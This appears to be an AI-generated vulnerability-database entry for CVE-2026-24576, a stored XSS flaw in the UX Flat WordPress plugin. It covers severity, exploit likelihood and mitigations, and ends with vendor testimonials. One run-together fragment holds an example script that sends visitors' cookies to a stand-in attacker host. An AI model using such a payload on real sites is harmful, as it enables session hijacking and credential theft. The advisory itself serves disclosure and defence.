
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-24576 is a Stored Cross-Site Scripting (XSS) vulnerability in the COP UX Flat WordPress plugin (slug: ux-flat). It affects all versions up to and including 5.4.0, with no official patched version available at the time of disclosure. The vulnerability was reported on January 20, 2026, by researcher theviper17 via Patchstack, and published to NVD on January 23, 2026. It carries a CVSS v3.1 base score of 6.5 (Medium), as assessed by Patchstack (Patchstack).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically a Stored XSS variant. An authenticated attacker with at least Contributor or Developer-level privileges can inject malicious scripts into content fields that are later rendered unsanitized in the browser of site visitors. Exploitation requires low attack complexity over a network vector, but does require user interaction — a privileged user must trigger the stored payload by visiting or rendering the affected page (Patchstack).
Successful exploitation allows an attacker to inject and persistently store malicious JavaScript within the WordPress site, which executes in the browsers of any user who visits the affected page. This can lead to session hijacking, credential theft, unauthorized redirects, defacement, or delivery of malicious payloads to site visitors. The confidentiality and integrity impacts are rated low, with no direct availability impact, but the stored nature of the XSS increases the risk of broad visitor exposure (Patchstack).
No public proof-of-concept exploit code or evidence of active in-the-wild exploitation has been reported for this vulnerability. The EPSS score is extremely low at 0.0001 (0.01%), indicating a very low probability of exploitation in the near term. It is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Patchstack notes that vulnerabilities of this class are sometimes used in mass-exploit campaigns targeting WordPress sites regardless of traffic size, but classifies this specific issue as low priority (Patchstack).
/wp-content/plugins/ux-flat/readme.txt.<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into a vulnerable input field.wp_posts table) containing <script> tags or encoded JavaScript payloads.As of the time of disclosure, no official patched version of the UX Flat plugin is available. Site administrators should consider deactivating and removing the UX Flat plugin until a fix is released. As a compensating control, restrict Contributor and Developer role assignments to trusted users only, and implement a Web Application Firewall (WAF) rule to detect and block XSS payloads. Patchstack users can leverage virtual patching to mitigate the vulnerability without removing the plugin (Patchstack).
Wordfence included this vulnerability in its weekly WordPress vulnerability report covering January 19–25, 2026, providing broader community visibility (Wordfence Blog). No significant vendor statements, researcher commentary, or notable social media discussion beyond routine vulnerability tracking has been identified for this CVE.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."